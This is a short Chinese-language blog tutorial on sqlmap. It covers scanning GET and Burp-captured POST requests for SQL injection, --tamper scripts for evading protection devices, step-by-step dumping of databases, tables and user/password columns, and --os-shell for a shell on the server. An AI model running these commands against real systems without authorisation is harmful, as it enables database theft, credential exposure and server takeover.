什么是sqlmap

本篇文章为大家展示了什么是sqlmap,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

sqlmap是检测sql注入神器,介绍一下sqlmap的快速上手扫描过程和参数。

运行环境为kali

get方式

首先是get方式传值情况,需要把传输数据名一起带上,如:?id=1

简单指令为:sqlmap -u 'http://xxxxxxxxxx?id=1'

什么是sqlmap

post方式

post方式需要先导出为文本文件,以包的方式测试注入

首先使用抓包工具捕获数据包,这里使用burp抓包,右键导出数据包保存为txt

什么是sqlmap

保存后键入命令:sqlmap -r /root/post.txt    /root/post.txt为导出的数据包。

什么是sqlmap

执行后即可验证是否存在sql注入

sqlmap的绕过防护设备

使用 –tamper引用替换方式绕过

使用方式为键入sqlmap -u 'http://xxxxxx' –tamper=xxxx.py

xxxx.py的选择需要根据数据库类型,防护设备规则来选择,sqlmap自带了一些绕过脚本,可打开tamper目录或者键入sqlmap –list-tampers查看

什么是sqlmap

最好摸索规则自己编写绕过脚本

sqlmap常用功能

检测到注入点后最常用的就是爆数据库

上述参数后加 –dbs   –tables  –colmus  –dump逐级深入

–dbs获取全部数据库

-D XXX –tables 获取xxx数据库里的表

-D xxx -T sss –columns 获取XXX表里的SSS字段

-D xxx -T sss -C “user,password” 获取字段user,password里的数据

再提一个 –os-shell 网站权限有写的权限可以生成一个上传点

上述内容就是什么是sqlmap,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

原创文章,作者:745907710,如若转载,请注明出处:https://blog.ytso.com/229068.html

(0)
上一篇 2022年1月12日
下一篇 2022年1月12日

相关推荐

发表回复

登录后才能评论